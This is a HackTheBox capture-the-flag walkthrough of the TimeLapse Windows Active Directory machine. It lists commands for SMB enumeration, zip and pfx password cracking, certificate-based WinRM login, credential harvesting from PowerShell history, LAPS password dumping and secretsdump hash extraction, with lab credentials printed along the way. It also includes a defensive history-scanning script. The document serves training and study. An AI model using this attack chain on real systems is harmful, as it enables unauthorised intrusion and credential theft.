TimeLapse HackTheBox WalkThrough


This is a walkthrough of the TimeLapse HackTheBox machine. In this writeup, I demonstrate step by step how I rooted it. Before starting, let us learn something about this machine. It is a Windows OS box with IP address and difficulty easy assigned by its maker.

First of all, connect your PC to the HackTheBox VPN and confirm your connectivity with the TimeLapse machine by pinging its IP. If all goes well, start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps with banner grabbing for the services running on different ports, and sometimes with vulnerability assessment as well. I used $ nmap [a popular port scanner] for this task, and the result is given below:


$ sudo nmap -p- --min-rate=10000 -oN tcpfull-scan.nmap
$ cat tcpfull-scan.nmap
Full port scan during TimeLapse HackTheBox walkthrough
$ sudo nmap -p53,88,135,139,389,445,464,593,636,3269,5986,9389 -sC -sV -oN tcpScript-scan.nmap
$ cat tcpScript-scan.nmap
TCP Script scan during TimeLapse HackTheBox walkthrough

The full port scan with $ nmap found ports 53, 88, 135, 139, 389, 445, 464, 593, 636, 3269, 5986 & 9389 open. Judging by the services on ports 53, 88 & 389, this appears to be an Active Directory environment. Among these ports, the notable ones are 53, 88, 135, 139, 389, 445 & 5986, since the services on them are well known. A DNS server is running on port 53, Kerberos on 88, Microsoft RPC on 135, SMB on 139 & 445, LDAP on 389 & 636, and WinRM on port 5986. We will use port 5986 for remote login once we get a credential.

As usual, I started my enumeration with ports 139 & 445, as the SMB service is running on these ports. If a null session is allowed, we will get some information to dig deeper. A null session is allowed here. Let us connect to the open share and download all the files from the shared folder. After downloading all the files, I found a zip file named winrm_backup.zip.

$ smbclient -U "" -L //
$ smbclient //
smb: \> cd Dev\
smb: \Dev\> get winrm_backup.zip
smb: \Dev\> exit
Listing the shares of Timelapse htb box during its walkthrough

The zip file is password protected.

$ unzip winrm_backup.zip
Unzipping winrm_backup.zip file during TimeLapse HackTheBox walkthrough

Cracking Password

I used $ johntheripper [an offline password cracker] with the wordlist rockyou.txt to crack the password of this file.

$ zip2john winrm_backup.zip > zip.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt zip.hash
Cracking zip password of winrm_backup.zip file

The cracked password is supremelegacy. On unzipping winrm_backup.zip, I found a pfx file inside it.

A pfx file is an archive file in PKCS #12 format. It contains both the public key (inside a certificate) and the private key, and sometimes a chain of certificates that establishes the trustworthiness of the certificate. The contents of a pfx file may or may not be password protected. A pfx file can be used for TLS/SSL on a web site, for digitally signing messages or authorization tokens, or for authenticating to a partner system.

Our pfx file is password protected. I tried to open it with some default passwords like admin, password, root, TimeLapse, etc., but none worked. So, we have to crack the password of this file too.

$ unzip winrm_backup.zip -d winrm_backup
$ cd winrm_backup/
$ open legacyy_dev_auth.pfx
Open pfx file after unzipping the archive file

To crack the password, I used the same tool, $ johntheripper [an offline password cracker], with the same wordlist, rockyou.txt [rockyou.txt is present by default in the directory /usr/share/wordlists/ in Kali and Parrot OS].

$ pfx2john legacyy_dev_auth.pfx > legacy.hash
$ john --wordlist=/usr/share/wordlists/rockyou.txt legacy.hash
Cracking pfx password of legacyy_dev_auth file

The cracked password is thuglegacy. Since the pfx file is an archive containing both the certificate (public key) and the private key, let us extract both from it. We can use the $ openssl tool for this purpose. I followed this article from the IBM documentation for the same.

$ cd winrm_backup/
$ openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -out private.key
Enter Import Password: thuglegacy
Enter PEM pass phrase: thuglegacy
Verifying - Enter PEM pass phrase: thuglegacy
$ openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out key.crt
Enter Import Password: thuglegacy

$ ls
Extracting key and certificate from pfx file

Now we have both the certificate containing the public key and the matching private key. Port 5986 is also open on the server, so we can use $ evil-winrm to connect to the TimeLapse machine using these keys. Let us remotely connect to the server.

Getting User Shell

$ evil-winrm -i -u " " -p "thuglegacy" -c key.crt -k private.key -S
$ whoami
Getting user shell using evil-winrm in TimeLapse HackTheBox walkthrough

We have successfully logged in to the TimeLapse box. Let us capture the user flag.

Capture User Flag

$ cat \Users\legacyy\Desktop\user.txt
Capturing user flag in timelapse htb

Privilege Escalation

To escalate privileges to root, we first have to find a privilege escalation vector. We can find a PrivEsc vector either manually or with post-exploitation enumeration scripts such as winPEAS, PowerUp.ps1, and many others. This time I will go with winPEAS, i.e. the script enumeration technique.

Finding PrivEsc Vector

winPEAS found a PowerShell console history file named ConsoleHost_history.txt inside the directory C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\.

The ConsoleHost_history.txt file is located at %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\. It holds the history of recent Windows PowerShell commands executed by a particular user. This file is the counterpart of the .bash_history file in Linux, as both contain the recent commands used by a particular user.

WinPEAS result during TimeLapse HackTheBox walkthrough

On checking the content of this file, I found some PowerShell remoting commands that had already been used on this machine. The user in those commands is svc_deploy and the user's password is E3R$Q62^12p7PLlC%KWaxuaV.

$ cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Content of ConsoleHost_history.txt file
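
From the defender's side, this kind of exposure can be found by auditing PSReadLine history files for commands that embed a plaintext secret. The following is an added example, not part of the original writeup: the patterns are assumed and non-exhaustive, and the sample history, account names and passwords are constructed placeholders.

```python
import re

# Assumed, non-exhaustive patterns for commands that leave a secret in the history file.
SECURESTRING = re.compile(
    r"(?:(?P<var>\$\w+)\s*=\s*)?ConvertTo-SecureString\b(?=.*-AsPlainText)"
    r"[^'\"]*(?P<q>['\"])(?P<secret>.+?)(?P=q)", re.I)
NET_USER = re.compile(
    r"\bnet(?:\.exe)?\s+user\s+(?P<account>[^\s/]+)\s+(?P<secret>[^\s/*]\S*)", re.I)
PSCREDENTIAL = re.compile(
    r"PSCredential\s*\(\s*['\"](?P<account>[^'\"]+)['\"]\s*,\s*(?P<var>\$\w+)", re.I)


def scan_history(text):
    """Return findings with the secret redacted so the report does not re-leak it."""
    lines = text.splitlines()
    # Map variable name -> account for lines that wrap that variable in a PSCredential.
    owners = {m["var"].lower(): m["account"]
              for line in lines for m in PSCREDENTIAL.finditer(line)}
    findings = []
    for number, line in enumerate(lines, start=1):
        for rule, pattern in (("plaintext-securestring", SECURESTRING),
                              ("net-user-password", NET_USER)):
            m = pattern.search(line)
            if not m:
                continue
            groups = m.groupdict()
            account = groups.get("account") or owners.get((groups.get("var") or "").lower())
            start, end = m.span("secret")
            findings.append({"line": number, "rule": rule, "account": account,
                             "redacted": line[:start] + "<redacted>" + line[end:]})
    return findings


# Constructed sample history; the passwords are placeholders, not values from the writeup.
SAMPLE_HISTORY = """whoami
$so = New-PSSessionOption -SkipCACheck -SkipCNCheck
$p = ConvertTo-SecureString 'PLACEHOLDER-Passw0rd!' -AsPlainText -Force
$c = New-Object System.Management.Automation.PSCredential ('svc_example', $p)
Invoke-Command -ComputerName localhost -Credential $c -UseSSL -SessionOption $so -ScriptBlock {whoami}
net user svc_example
net user helpdesk_example PLACEHOLDER-Temp123 /add
"""

if __name__ == "__main__":
    for finding in scan_history(SAMPLE_HISTORY):
        print(finding)
```

Any account reported this way should have its password rotated and the history file cleared, since every user who can read the profile directory can read the secret.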

When I checked the details of the user svc_deploy, I found that svc_deploy is a member of the LAPS_Readers group.

$ net user svc_deploy
svc_deploy user details found using net user command

Since svc_deploy is a member of the LAPS_Readers group, we can use the LAPSDumper tool to dump every LAPS password the account has access to read within the entire domain. To use LAPSDumper, follow the steps below.

$ git clone https://github.com/n00py/LAPSDumper.git
$ cd LAPSDumper/
$ python3 laps.py -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -d 'timelapse.htb'
Downloading and using LAPSDumper to extract password

The extracted local admin password is 5cz8(5ZNvaONZ4u1rio)b#/.. When I tried to log in to the admin account using the credential Administrator : 5cz8(5ZNvaONZ4u1rio)b#/. I was easily logged in as local admin. So here, our privilege escalation vector is the reuse of a credential stored in the PowerShell history.

Since the WinRM port [5986] is open, let us use the above credential to get admin access using $ evil-winrm.

Getting Admin Shell

$ evil-winrm -u administrator -p '5cz8(5ZNvaONZ4u1rio)b#/.' -i -S
$ whoami
Getting root shell during TimeLapse HackTheBox walkthrough

We have successfully logged in to the local admin account. Let us capture the root flag.

Capture Root Flag

$ Get-Childitem -Path C:\Users -Include root.txt -Recurse
$ cat C:\Users\TRX\Desktop\root.txt
Capturing root flag in timelapse htb

Dumping Root Hash

$ impacket-secretsdump [email protected]
Dumping root hash using impacket-secretsdump module

This was how I rooted the TimeLapse HackTheBox machine. I learnt a lot during this walkthrough and hope you have also learnt some new things. Thanks for reading this writeup. If you want to give any suggestion about the writeup, feel free to write to us at [email protected]. Check out my latest articles at https://ethicalhacs.com/.


Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player by night. I sometimes write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/